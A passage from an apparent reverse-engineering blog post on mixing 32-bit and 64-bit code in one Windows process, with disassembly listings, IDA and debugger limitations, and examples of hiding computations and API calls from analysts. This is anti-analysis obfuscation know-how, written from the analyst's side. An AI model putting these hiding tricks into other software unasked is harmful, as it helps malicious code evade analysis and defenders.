<div>
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 jmp far ptr 33h:401019</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 _main endp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401019 db 48h ; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101A db 83h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101B db 0ECh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101C db 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D db 89h ; mov dword ptr [rsp], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101E db 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101F db 24h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401020 db 48h ; mov rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401021 db 8Bh </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 db 0C4h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401023 db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401024 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401025 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401026 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401027 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401028 db 5Bh ; pop rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029 db 48h ; mov rax, 2Bh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102A db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102B db 2Bh </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102D db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102E db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102F db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401030 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401031 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401032 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401033 db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401034 db 53h ; push rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401035 db 48h ; mov rax, 246h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401036 db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401037 db 46h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401038 db 2</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401039 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103A db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103B db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103C db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103D db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103E db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103F db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401040 db 48h ; mov rax, 23h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401041 db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401042 db 23h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401043 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401044 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401045 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401046 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401047 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401048 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401049 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104A db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104B db 48h ; mov rax, 401080h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104C db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104D db 80h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104E db 10h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F db 40h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401050 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401051 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401052 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401053 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401054 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401055 db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401056 db 48h ; iretq</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401057 db 0CFh </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 pop eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I compiled a simple C program, and in the main() function I put a call to </span><span style="font-family: Courier New, Courier, monospace;">DebugBreak</span><span style="font-family: Verdana, sans-serif;"> to conveniently spawn the remote debugger, then a series of nops which I later modified with the opcodes I needed. You can clearly see the far jump at line </span><span style="font-family: Courier New, Courier, monospace;">0x00401010</span><span style="font-family: Verdana, sans-serif;">: it jumps to the segment </span><span style="font-family: Courier New, Courier, monospace;">0x0033</span><span style="font-family: Verdana, sans-serif;"> and to the virtual address </span><span style="font-family: Courier New, Courier, monospace;">0x00401019</span><span style="font-family: Verdana, sans-serif;">. The code at </span><span style="font-family: Courier New, Courier, monospace;">0x00401019</span><span style="font-family: Verdana, sans-serif;"> is to be read as 64bit instructions, but the executable is loaded in IDA as a 32bit PE, </span><span style="font-family: Verdana, sans-serif;">so you see it as data and not as 64bit instructions.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have put comments on line </span><span style="font-family: Courier New, Courier, monospace;">0x00401019</span><span style="font-family: Verdana, sans-serif;">, </span><span style="font-family: Courier New, Courier, monospace;">0x0040101d</span><span style="font-family: Verdana, sans-serif;"> etc. to indicate the 64bit instructions</span><span style="font-family: Verdana, sans-serif;">, they are simply pushing the correct values on the stack in order to be able to switch back to 32bit mode. In order, the following values are pushed:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the stack segment selector</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the stack pointer</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the eflags register</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the code segment selector (</span><span style="font-family: Courier New, Courier, monospace;">0x0023</span><span style="font-family: Verdana, sans-serif;"> is the standard usermode code segment)</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the instruction pointer (in this case, it is </span><span style="font-family: Courier New, Courier, monospace;">0x00401080</span><span style="font-family: Verdana, sans-serif;">)</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The iretq will restore all these values, starting the execution in 32bit mode from address </span><span style="font-family: Courier New, Courier, monospace;">0x0023:0x00401080</span><span style="font-family: Verdana, sans-serif;">, but bear in mind that the 64bit code also changes the state of the registers in 32bit mode. So it's up to you to preserve the registers that need to be saved across switches.</span></div>
</div>
</div>
<div>
<br /></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif;">2.3 - Some issues with the decompilers</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Of course you can always open the PE file as a binary file in IDA64, and then manually decompile those instructions, but there are some issues:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">The file is opened as a binary file, which means that if an opcode is referencing a memory location IDA will not show you the x-refs. For instance, if you have "</span><span style="font-family: Courier New, Courier, monospace;">mov rax, 0x00402000"</span><span style="font-family: Verdana, sans-serif;">, since the file is loaded as a binary file and not as a PE, there will not be a reference to the virtual address </span><span style="font-family: Courier New, Courier, monospace;">0x00402000</span><span style="font-family: Verdana, sans-serif;">.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">IDA will not know where the 64bit code snippets are in the file, so you will need to manually get every virtual address from the 32bit PE, translate it to a file offset and then find it in the 64bit binary file loaded in IDA. Annoying!</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">If you have a complex computation (for example, a decryption routine) that interleaves 32bit and 64bit instructions to perform a task, then following the whole routine through static analysis is really a pain: you need to use two sessions of IDA to understand all the code.</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To solve these problems, IDA actually lets you interleave 32bit and 64bit code: you can load a 32bit PE file in IDA64, then locate the 64bit snippet and create a 64bit segment specifying the starting and ending address of such snippet. In this case you can successfully browse a 32bit PE file, disassembling 64bit instructions where needed. The drawback is that you manually have to create a segment each time you see a 64bit code snippet, which is rather annoying. The result is something like this:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401000 _main<span class="Apple-tab-span" style="white-space: pre;"> </span> proc near</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401000<span class="Apple-tab-span" style="white-space: pre;"> </span> call ds:DebugBreak</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401006<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401007<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401008<span class="Apple-tab-span" style="white-space: pre;"> </span> mov edx, 12345678h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040100D<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040100E<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040100F<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401010<span class="Apple-tab-span" style="white-space: pre;"> </span> jmp far ptr 33h:<b><u>401020h</u></b></span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 _main<span class="Apple-tab-span" style="white-space: pre;"> </span> endp</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040101F _text<span class="Apple-tab-span" style="white-space: pre;"> </span> ends</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020 ; ===========================================================================</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:<b><u>0000000000401020</u> </b>; Segment type: Regular</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020 TEST1<span class="Apple-tab-span" style="white-space: pre;"> </span> segment byte public '' use64</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> assume cs:TEST1</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> ;org 401020h</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> assume es:nothing, ss:nothing, ds:nothing</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, rsp</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401023<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401024<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401025<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401026<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401027<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401028<span class="Apple-tab-span" style="white-space: pre;"> </span> pop rbx</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401029<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, 2Bh</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401033<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401034<span class="Apple-tab-span" style="white-space: pre;"> </span> push rbx</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401035<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, 246h</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040103F<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401040<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, 23h</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040104A<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040104B<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, <b><u>401080h</u></b></span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401055<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401056<span class="Apple-tab-span" style="white-space: pre;"> </span> add rdx, rdx</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401059<span class="Apple-tab-span" style="white-space: pre;"> </span> iretq</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401059 ; ---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040107F TEST1<span class="Apple-tab-span" style="white-space: pre;"> </span> ends</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 ; ===========================================================================</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:<b><u>00401080</u> </b>; Segment type: Pure code</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 ; Segment permissions: Read/Execute</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 _text<span class="Apple-tab-span" style="white-space: pre;"> </span> segment para public 'CODE' use32</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> assume cs:_text</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> ;org 401080h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> assume es:TEST1,<span class="Apple-tab-span" style="white-space: pre;"> </span>ss:TEST1, ds:_data</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401081<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D4<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D5<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D6<span class="Apple-tab-span" style="white-space: pre;"> </span> xor eax, eax</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D8<span class="Apple-tab-span" style="white-space: pre;"> </span> retn</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Notice that you don't have any cross references for memory locations between segments, even manually using the "offset" command won't work.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">These issues show up mainly in static analysis, if you are debugging the code you can just follow it and the obfuscation won't matter. Or will it? Well, it turns out that debuggers don't work very well with 64bit code, and besides, it is common to analyse parts of an executable without having the possibility to run them, so this is a serious issue. </span></div>
</div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">3 - Debuggers</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">Let's have a quick overview of the debugging problems.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Verdana, sans-serif;">3.1 - Which one works?</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have tested some common debuggers and, as I briefly mentioned in section 2.3, the results are poor:</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Ollydbg</u> - It can debug a 32bit process, but it won't be able to trace the far jumps. If you try to step over/into one of those jumps, the debugger will lose control, and will end up somewhere else in the code.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Syser Win32 Debugger</u><b> </b>- Same as Ollydbg.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Syser kernel debugger</u><b> </b>- It doesn't run on 64bit Windows.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Windbg local debugger</u> - Same as Ollydbg.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Windbg remote kernel debugger</u> - The only one that works. When doing remote debugging, you can step into the far jumps and the iretqs, so you can debug the code. Unfortunately there are some other limitations, like the code assembler (that is, the "a" command) does not support 64bit instructions, so if you have to patch an executable for any reason, you will have to patch the opcode bytes manually. Not the end of the world, but not nice either.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>IDA</u> - You can try and use IDA's built-in debugger, but it won't directly load 64bit PE executables. It requires you to use <i>dbgsrv</i> component from Windbg and then start a remote debugging session. I have not fully tested this feature, but since it uses <i>dbgsrv</i> it may work. Still, it requires remote debugging.</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If you want to debug an executable that switches between 32bit and 64bit you need to use Windbg remote kernel debugging, I have not found another easy way to do it. Luckily, machines nowadays are pretty powerful and capable of running virtual machines, but still, it would be much easier to be able to debug this sort of code locally.</span></div>
</div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif;">3.2 - A small workaround</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have said that Ollydbg (and basically all other usermode debuggers) is not able to step through far jumps, and that if you try you lose control of the execution, but there is still a way to bypass the problem. If you know the 32bit address at which the 64bit code will return to (via an iretq), then you can put a bpx on it, let the program run, and the debugger will break on it, thus bypassing the 64bit code completely. To explain it more clearly:</span></div>
</div>
<div>
<ul>
<li><span style="font-family: Verdana, sans-serif;">you arrive at a far jump that will switch to 64bit mode</span></li>
<li><span style="font-family: Verdana, sans-serif;">you know that the 64bit code will return to 32bit address xyz</span></li>
<li><span style="font-family: Verdana, sans-serif;">you set a bpx on address xyz</span></li>
<li><span style="font-family: Verdana, sans-serif;">you let the program run</span></li>
<li><span style="font-family: Verdana, sans-serif;">the debugger will break on xyz</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In this way, you completely bypass the 64bit snippet. But of course, it requires you to have previously analysed such snippet, and determined which 32bit address it will return to, which slows everything down.</span></div>
</div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">4 - Some examples of obfuscation</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The state of the registers (and of the memory, stack etc.) is maintained across switches, which means you can perform any computation splitting parts of it between 32bit and 64bit.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">For example, we can modify the test code in section 2.2 as follows (this time, for clarity, I'm writing the assembly code instead of the opcodes):</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------ 32bit code ------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401008 mov edx, 12345678h ; set edx before 64bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040100D nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040100E nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040100F nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 jmp far ptr 33h:401019h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------ 64bit code ------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401019 <span class="Apple-tab-span" style="white-space: pre;"> </span>sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D <span class="Apple-tab-span" style="white-space: pre;"> </span>mov dword ptr [rsp], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401020<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401023<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401024<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401025<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401026<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401027<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401028<span class="Apple-tab-span" style="white-space: pre;"> </span>pop<span class="Apple-tab-span" style="white-space: pre;"> </span>rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 2Bh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401033<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401034<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401035<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 246h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103F<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401040<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 23h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104A<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104B<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 401080h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401055<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401056<span class="Apple-tab-span" style="white-space: pre;"> </span>add<span class="Apple-tab-span" style="white-space: pre;"> </span>rdx, rdx ; modifies edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401059<span class="Apple-tab-span" style="white-space: pre;"> </span>iretq ; returns to 32bit address 0x00401080</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------ 32bit code ------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span>pop eax ; edx is now 0x12345678 + 0x12345678</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The code starts by setting a value (0x12345678) in the register EDX. Then, it jumps to 64bit mode, and the 64bit instructions simply double up the value of EDX. At this point, when the code returns in 32bit mode, EDX contains the value that has been doubled in the 64bit snippet (it would be 0x2468ACF0). The same holds for the stack: you can push 32bit values from the 64bit mode, and they will remain on the stack (assuming you don't change it with the iretq). This means you can hide stack parameters for API calls. Moreover, you can hide the API call itself: all you need to do is to jump in 64bit mode and call its corresponding 64bit version.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This may require some preparation (push the correct parameters, type conversions, etc.), but it's nothing too complicated:</span></div>
</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9LTHG9GD8nhMWnvgVqtb8lpDGEVagAPpTMbafWQNiSKZxdHgzCwg_rmZhF1SPwIpkMHX1g0ryXHckaqI0MrFJ7U10yl2lVHfEXbZMrF-30P5JFyLxSMpXg5xCOHuykeJvIybtRyUedQ/s1600/jmpred3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9LTHG9GD8nhMWnvgVqtb8lpDGEVagAPpTMbafWQNiSKZxdHgzCwg_rmZhF1SPwIpkMHX1g0ryXHckaqI0MrFJ7U10yl2lVHfEXbZMrF-30P5JFyLxSMpXg5xCOHuykeJvIybtRyUedQ/s1600/jmpred3.png" /></a></div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is an example of how you can call an API from 64bit, but of course you can do it in many other ways, or you can even invoke the SYSCALL yourself.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another interesting trick is that of using a snippet of code that can be executed in both 32bit and 64bit mode, and it will perform a different computation depending on which mode you are in. For example the sequence of bytes </span></div>
</div>
<div>
